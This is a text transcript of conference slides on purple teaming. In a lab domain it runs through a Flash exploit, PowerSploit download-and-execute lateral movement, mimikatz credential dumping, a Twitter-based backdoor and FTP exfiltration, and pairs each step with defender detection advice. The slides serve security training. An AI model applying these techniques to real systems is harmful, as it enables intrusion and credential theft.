purple view
Post on 07-Jan-2017
676 Views
Preview:
TRANSCRIPT
Purple ViewThe recent trend of using Attack and Defense
Together
Not OUR idea - backed by many@raffertylaura | @haydnjohnson
Quick who are weHaydn Johnson
@haydnjohnson
OSCP
Offensive/Attack Interest
Enjoys presenting
Laura
@raffertylaura
MSc Computer Science (Security/Privacy)
Interested in both sides of security
Loooooves presenting
@raffertylaura | @haydnjohnson
Contents1. Basic Term Definition2. Introduction to Red, Blue and Purple3. Run through of an Attack
○ Gaining Access○ Lateral Movement○ Domain Admin○ Maintaining Access○ Data Exfiltration
4. For each attack:○ Attacking View○ Defenders View○ Possible Purple Team exercises
@raffertylaura | @haydnjohnson
DefinitionsExploit - The thing used to gain unauthorized access to a system
Payload - What is done after the access is gained (shell, command)
Metasploit - An open source exploit framework, modular
Meterpreter - an advanced, extensible payload that uses in-memory DLL injection
Shell - Gaining Terminal/CMD access remotely
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/http://www.metasploit.com/
Red Team - Penetration | Offensive● Scans● Exploits● Logic abuse● Access to things they shouldn’t
@raffertylaura | @haydnjohnson
Blue Team - Block, Prevent, Detect | Defensive● Logs● Emails● Events● Triggers● Networking● More Logs
@raffertylaura | @haydnjohnson
Red Team - Goals● Model recent threats and trends● Longer term● Highlight Gaps in Security Controls, detection etc● Escape and Evade for Persistence
@raffertylaura | @haydnjohnson
Blue Team - Goals
● Detect Attack● Respond and Recover● Produce Actionable Intelligence● Identify Gaps and investment needs
@raffertylaura | @haydnjohnson
Purple Team - Offensive & DefensiveWorking together to achieve the ultimate goal of making the organization more secure
● Exposes blue team to different threats & attacker mindset ● Test incident detection and response● Allows red team to sharpen skills● Policy and procedures tested● Tuning of controls
@raffertylaura | @haydnjohnson
Purple Team - Offensive & DefensiveDifferent types of Purple Teaming
● Read Team Sitting with Network Defense team● Adversary Simulation● Traffic Generation● cobaltstrike.com● Wargaming
Requires total picture involving all areas of the organization
@raffertylaura | @haydnjohnson
Purple Team - The difference● Using Security Posture and Weaknesses to find what is most valuable● Goal Oriented● Review attack● Test how teams use services and how they are managed
@raffertylaura | @haydnjohnson
Purple Team - The difference● Time to Domain Admin● Time to Data/Objective● Time to Respond● Time to Recover● Identify where there needs to be more investment● Measure Impact
Done right, the blue team should come out with better monitoring and response plans.
@raffertylaura | @haydnjohnson
Purple Team - The difference● Set up a fake scenario - Assume Breach● How will the attacker gain access?● Why have they attacked, what do they want?● How did they move through the network?● If they exfiltrated data, how?
Do not turn off servers, block IP addresses, make it realistic
@raffertylaura | @haydnjohnson
Purple Team - Exercise“In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.”
- Raphael Mudge
http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
@raffertylaura | @haydnjohnson
Purple Team - DEMO (step by step)Our exercise
@raffertylaura | @haydnjohnson
Purple Team - Demo Architecture
@raffertylaura | @haydnjohnson
Domain: corp.test.com
Tools UsedRed Team:
● Kali Linux● Metasploit● Meterpreter● PowerSploit● Twittor
Blue Team:
● Wireshark● Windows Event Logs
@raffertylaura | @haydnjohnson
Setting up Windows GP
@raffertylaura | @haydnjohnson
Gaining AccessHacking Team Flash Exploit
@raffertylaura | @haydnjohnson
Flash Exploits
@raffertylaura | @haydnjohnson
● Flash plugins are vulnerable ○ You can embed a javascript/binary within a Flash file○ ActionScript to define events to redirect to landing page
● Most exploit kit landing pages redirect to pages containing Flash exploits○ Angler○ Nuclear○ Fiesta
● Installed by default on browser● New vulnerabilities are identified on almost a weekly basis
Gaining Access
@raffertylaura | @haydnjohnson
Flash 18.0.0.194
A: Flash Exploit from SecurityFocus
Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
A: Start Flash Exploit from Kali
@raffertylaura | @haydnjohnson
A: Start Flash Exploit from Kali
@raffertylaura | @haydnjohnson
Client1 User navigates to malicious site which redirects to the exploit
A: Redirect Victim
@raffertylaura | @haydnjohnson
A: Client1 is exploited
@raffertylaura | @haydnjohnson
A: A session is now established with Client1We can now run Meterpreter
@raffertylaura | @haydnjohnson
B: Wireshark: Landing Page and Redirect
@raffertylaura | @haydnjohnson
B: Wireshark: Shell
@raffertylaura | @haydnjohnson
B: What can you take awaySecurity Onion, implement it, free
Has snort rules for Flash exploits (need to install)
Confirm if flash is needed for business reasons
Keep flash updated
2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules) 2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules)
@raffertylaura | @haydnjohnson
https://www.security-database.com/detail.php?alert=CVE-2015-5119https://security-onion-solutions.github.io/security-onion/
Purple Team - Exercise● Blue team understands how attackers can gain initial access● Flash exploits - ongoing issue ● Helps blue team to identify suspicious traffic and what is happening from the
attacker perspective● Red team sees how attacks are visible by blue team and think of ways to
make it more stealthy
@raffertylaura | @haydnjohnson
Privilege EscalationNot Shown
@raffertylaura | @haydnjohnson
Privilege Escalation● We are skipping privilege escalation from Domain User to Local Admin
@raffertylaura | @haydnjohnson
Lateral MovementPowerSploit
@raffertylaura | @haydnjohnson
A: PowerSploitAvailable on Github
Open Source
https://github.com/mattifestation/PowerSploit@raffertylaura | @haydnjohnson
A: PowerSploit
More than 1 script!
PowerShell Modules
@raffertylaura | @haydnjohnson
PowerViewPart of PowerShell Empire
Very advanced
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView @raffertylaura | @haydnjohnson
A: Lateral MovementThe same local Administrator account passwords on multiple computers.
by Sean Metcalf
https://adsecurity.org/?p=1684@raffertylaura | @haydnjohnson
Same Passwords for All Local Admins
A: Lateral Movement
@raffertylaura | @haydnjohnson
A: Lateral MovementPowersploit
Remote Powershell
Using Invoke--Shellcode.ps1
@raffertylaura | @haydnjohnson
A: Base64 Encoding PayloadRemove issues with whitespace
The Hacker Playbook 1 (now 2)
@raffertylaura | @haydnjohnsonhttp://thehackerplaybook.com/dashboard/
A: Hosting Powersploit Invoke--Shellcode.ps1PowerSploit code hosted on local Kali machine
@raffertylaura | @haydnjohnson
A: Invoke-WmiMethodUse powershell to connect remotely, create a new process and launch the IEX cradle.
Calls Windows Management Instrumentation (WMI) methods.
The Win32_Process WMI class allows creation of a process.
@raffertylaura | @haydnjohnson
A: Execute Remote commandExecute command from Client1 to tell Client2 to download and execute shellcode
@raffertylaura | @haydnjohnson
A: Client1 gives same passwordSame password across multiple clients
@raffertylaura | @haydnjohnson
A: Receive Shell
@raffertylaura | @haydnjohnson
B: WireShark trafficTCP Hand Shake
Bind Requests
@raffertylaura | @haydnjohnson
B: Client1 requests remote instance on Client2
@raffertylaura | @haydnjohnson
B: Client2 eventually asks where is Kali
@raffertylaura | @haydnjohnson
B: Client2 downloads Invoke--Shellcode.ps1
@raffertylaura | @haydnjohnson
B: Client1 logs into Client2
@raffertylaura | @haydnjohnson
B: PowerShell Process Created
@raffertylaura | @haydnjohnson
B: PowerShell connects to KaliClient2 reaches out to Kali on port 80
@raffertylaura | @haydnjohnson
B: What can you take awayEvent Correlation - based on event ID, source and destination for remote connections
Implement alerting based on Security Events together
SIEM can/SHOULD do this
Use Log MD - really great logging tool, especially for powershell
@raffertylaura | @haydnjohnson
http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-through-the-junk
http://malwarearchaeology.squarespace.com/log-md/
Purple Team - Benefits● Identify ways to move around the network● Identify and confirm Defensive Controls in Place● Identify what worked, what did not● Implement changes● Justification for resources
@raffertylaura | @haydnjohnson
Privilege EscalationLocal Admin to Domain Admin
@raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin
@raffertylaura | @haydnjohnson
● Why escalate privileges from Local Admin to Domain Admin?● Domain admin - control over active directory!● Access IT resources● Create accounts● Propagate malware
A: Local Admin to Domain Admin
@raffertylaura | @haydnjohnson
A: Local Admin to Domain AdminFrom Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
@raffertylaura | @haydnjohnson
A: Local Admin to Domain AdminUse psexec to run mimikatz.exe on Client2
@raffertylaura | @haydnjohnson
A: Local Admin to Domain AdminUse sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2!
@raffertylaura | @haydnjohnson
B: Wireshark:
@raffertylaura | @haydnjohnson
B: Event LogsClient1 logs into Client2 local admin
B: Event LogsClient1 runs mimikatz
on Client2
@raffertylaura | @haydnjohnson
B: Event Logs
Sensitive privilege use from Client1
to Client2
B: What can you take away
● Prevention:○ Access control for shared drive○ Limit access to psexec and monitor use○ Active Directory best practices
● Detection:○ IDS signatures ○ SIEM use case - Event correlation between system logs and network proxy logs○ For lateral movement: enable file level auditing○ Canary accounts
Purple Team - Benefits● Blue team observes vulnerabilities/threats which may not have been
considered○ Learns how attacker could escalate privileges from local admin to domain admin
● Red team observes the footprint left behind from this attack and possibly how to minimize it
○ Can identify potential weaknesses in blue team monitoring/response processes○ Provide more thorough recommendations
@raffertylaura | @haydnjohnson
TwittorBackdoor using Twitter
@raffertylaura | @haydnjohnson
A: Twittor● Easy to install● Easy to Use● Easy to add
Shellcode
https://github.com/PaulSec/twittor @raffertylaura | @haydnjohnson
A: Twittor - insidesSimple Subprocess execution
Stored as base64 encoded message
A: PyinstallerOn Github
Turn Python file into EXE
@raffertylaura | @haydnjohnsonhttps://github.com/pyinstaller/pyinstaller
A: Pyinstaller Python File becomes Executable
@raffertylaura | @haydnjohnson
@raffertylaura | @haydnjohnson
Twittor: Backdoor Using Twitter
A: Twittor Python file used as C2 Server Python file used as backdoor
EXE - Pyinstaller
@raffertylaura | @haydnjohnson
A: Twittor - Retrieving commandSend Command to execute
Retrieve command
@raffertylaura | @haydnjohnson
B: Twittor - Network TrafficReaching out to API
Normal User Traffic??
@raffertylaura | @haydnjohnson
B: Twittor - Client systemBackdoor as Python Executable compiled with --no-console flag to hide output
@raffertylaura | @haydnjohnson
B: Traffic from ClientReaches out to twitter
Src and Destination are internal IPs, sends to API
@raffertylaura | @haydnjohnson
B: What can you take awayCheck if there are any remote connections after hours, is it against policy?
Again, Correlate logs with known C2 addresses
See if AV picks it up
@raffertylaura | @haydnjohnson
Purple Team - BenefitsTest if a C2 can reach out to twitter.
Social Media may be blocked via the browser, but some sites can still be accessed via API etc.
If it is not blocked, why not, can your blue team help to stop this and others.
@raffertylaura | @haydnjohnson
Data ExfiltrationClear Text FTP
@raffertylaura | @haydnjohnson
@raffertylaura | @haydnjohnson
A: Data Exfiltration Through Clear Text FTP
A: FTP ExtractionFinding Data to extract
@raffertylaura | @haydnjohnson
A: Finding dataImportant data identified
@raffertylaura | @haydnjohnson
A: Downloading data
@raffertylaura | @haydnjohnson
A: Data Transferred
@raffertylaura | @haydnjohnson
B: Meterpreter connection DLL injection
Lots of chatter
@raffertylaura | @haydnjohnson
B: FTP connection Clear Text
@raffertylaura | @haydnjohnson
B: Successful Transfer
@raffertylaura | @haydnjohnson
B: What can you take away?
@raffertylaura | @haydnjohnson
Disable FTP - should not have a business need for it really
If there is a business need whitelist those IP addresses | Create a group of users specifically for FTP
Purple Team - ExerciseClear Text
Will any alarms trigger?
Understand potential holes in alerting
Measure time to detect and respond
@raffertylaura | @haydnjohnson
ConclusionPurple Teaming is Good
@raffertylaura | @haydnjohnson
Purple Team - ReiterationProvides more value than a Penetration Test
Should be implemented into a regular schedule
Helps train security personnel
Helps make sure your boxes are tuned
@raffertylaura | @haydnjohnson
Limitations and Future Work● So far we have limited detection tools to Windows Server event logs and
Wireshark, (and a bit of Snort)● Could be extended for enterprise security tools such as SIEM/IDS● Powershell/WMI for blue team● More advanced attacks, persistence using Powershell Empire
@raffertylaura | @haydnjohnson
Obligatory Cute Kat Picture
References are in following slides
@raffertylaura | @haydnjohnson
Microsoft - 8 minute Videohttps://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
@raffertylaura | @haydnjohnson
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
http://www.slideshare.net/beltface/hybrid-talk@raffertylaura | @haydnjohnson
A: Downloads PowerShell fileClient2 reaches out to Kali machine
@raffertylaura | @haydnjohnson
top related